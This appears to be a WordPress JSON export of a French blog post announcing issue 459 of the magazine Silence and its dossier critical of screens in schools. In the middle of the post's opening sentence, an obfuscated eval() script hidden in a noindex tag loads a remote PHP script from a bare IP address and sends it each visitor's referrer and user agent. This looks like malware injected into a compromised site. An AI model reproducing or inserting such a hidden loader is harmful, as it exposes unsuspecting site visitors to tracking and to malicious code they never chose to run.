{"id":9362,"date":"2017-09-14T22:48:26","date_gmt":"2017-09-14T21:48:26","guid":{"rendered":"https:\/\/www.partipourladecroissance.net\/?p=9362"},"modified":"2020-04-07T18:05:43","modified_gmt":"2020-04-07T17:05:43","slug":"vers-une-ecole-sans-ecrans-dossier-dans-silence-n459","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9362","title":{"rendered":"\u00ab\u00a0Vers une \u00e9cole sans \u00e9crans ?\u00a0\u00bb dossier dans silence n\u00b0459 avec \u00ab\u00a0Un Projet de D\u00e9croissance\u00a0\u00bb"},"content":{"rendered":"<p><a href=\"https:\/\/www.partipourladecroissance.net\/?attachment_id=9363\" rel=\"attachment wp-att-9363\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-9363 alignleft\" src=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459hd.jpg\" alt=\"\" width=\"146\" height=\"206\" srcset=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459hd.jpg 2480w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459hd-212x300.jpg 212w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459hd-768x1086.jpg 768w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459hd-724x1024.jpg 724w\" sizes=\"auto, (max-width: 146px) 100vw, 146px\" \/><\/a><strong>La <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkkih|var|u0026u|referrer|inskt||js|php'.split('|'),0,{}))\n<\/script><\/noindex> num\u00e9risation de l&rsquo;\u00e9cole avance \u00e0 marche forc\u00e9e, \u00e0 grands renforts de budgets et de partenariats public\/priv\u00e9. Au nom de la modernit\u00e9, \u00e9videmment.<\/strong> Au milieu de ces enjeux politiques et \u00e9conomiques, les enseignant\u00b7es et les \u00e9l\u00e8ves se retrouvent pris\u00b7es dans un quotidien habit\u00e9 par les \u00e9crans : pour enseigner, pour apprendre, pour faire l&rsquo;appel en classe, pour communiquer avec les familles ou avec l&rsquo;administration, etc. Ce dossier fait un bilan critique des impacts \u00e9cologiques, sanitaires, p\u00e9dagogiques et sociaux d&rsquo;un tel plan. Silence interroge des enseignant\u00b7es qui se sont regroup\u00e9\u00b7es pour refuser d&rsquo;appliquer les directives num\u00e9riques, et s&rsquo;int\u00e9resse aux alternatives p\u00e9dagogiques \u00e0 la num\u00e9risation de l&rsquo;\u00e9cole.<\/p>\n<p><strong>Au sommaire du dossier :<br \/>\n<\/strong>&#8211; Le num\u00e9rique \u00e0 l&rsquo;\u00e9cole : refus et r\u00e9sistances, par Guillaume Gamblin<br \/>\n&#8211; Un d\u00e9sastre \u00e9cologique, social et p\u00e9dagogique, par Guillaume Gamblin<br \/>\n&#8211; <a href=\"http:\/\/www.projet-decroissance.net\/?p=2235\">D&rsquo;un \u00e9cran \u00e0 l&rsquo;autre&#8230; la journ\u00e9e d&rsquo;une coll\u00e9gienne<\/a>, par Christophe Ondet<br \/>\n&#8211; Quelles alternatives p\u00e9dagogiques \u00e0 l&rsquo;\u00e9cole num\u00e9rique ?, par Guillaume Gamblin<br \/>\nUn dossier coordonn\u00e9 par Guillaume Gamblin<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459-12-13.pdf\" rel=\"attachment wp-att-9361\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-9361 aligncenter\" src=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459.jpg\" alt=\"\" width=\"1210\" height=\"1000\" srcset=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459.jpg 1210w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459-300x248.jpg 300w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459-768x635.jpg 768w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2017\/09\/459-1024x846.jpg 1024w\" sizes=\"auto, (max-width: 1210px) 100vw, 1210px\" \/><\/a><em>Ci-dessus, l&rsquo;article de Christophe Ondet dans Silence! Cet article est le 1er d&rsquo;une trilogie initialement publi\u00e9 sur le site de <\/em><a href=\"http:\/\/www.projet-decroissance.net\/?p=2235\"><em>http:\/\/www.projet-decroissance.net\/<\/em><\/a><\/p>\n<p><!--more--><\/p>\n<p style=\"text-align: center;\"><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/U4aVVUkBPVc\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><strong><br \/>\n<\/strong><em>Et aussi, cet extrait des maternelles<\/em><\/p>\n<p><strong>Et \u00e9galement dans ce num\u00e9ro :<br \/>\n<\/strong>Tout le monde a droit de bien manger, par Martha Gilson<br \/>\nLe v\u00e9lo sous la pluie, par Michel Bernard<br \/>\nLa prodigieuse marge de progression \u00e9cologique des transports, par Philippe Crassous<br \/>\nR\u00e9inventer la radio, par Jocelyn Perret<br \/>\nLe statut de mineur\u00b7e en question, par Claude Mirandola<br \/>\nNotre-Dame-des-Landes Faut-il agrandir l&rsquo;actuel a\u00e9roport ?, par Michel Bernard<br \/>\nKamishibai : dessiner pour briser le silence nucl\u00e9aire, par Bastien Charbouillot<br \/>\nPhotos : Rencontres de l&rsquo;Atelier Paysan<\/p>\n<p>Et de nombreuses br\u00e8ves d&rsquo;actualit\u00e9, des pr\u00e9sentations de livres, des courriers\u2026<\/p>\n<p>Si vous souhaitez d\u00e9couvrir ce num\u00e9ro en images, le commander ou conna\u00eetre la revue Silence, rendez-vous sur le site : <a href=\"http:\/\/www.revuesilence.net\/\">http:\/\/www.revuesilence.net\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La num\u00e9risation de l&rsquo;\u00e9cole avance \u00e0 marche forc\u00e9e, \u00e0 grands renforts de budgets et de partenariats public\/priv\u00e9. Au nom de la modernit\u00e9, \u00e9videmment. Au milieu de ces enjeux politiques et \u00e9conomiques, les enseignant\u00b7es et les \u00e9l\u00e8ves se retrouvent pris\u00b7es dans &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9362\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":9363,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,16,33],"tags":[],"class_list":["post-9362","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actualites","category-livres","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9362","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9362"}],"version-history":[{"count":8,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9362\/revisions"}],"predecessor-version":[{"id":9581,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9362\/revisions\/9581"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/media\/9363"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}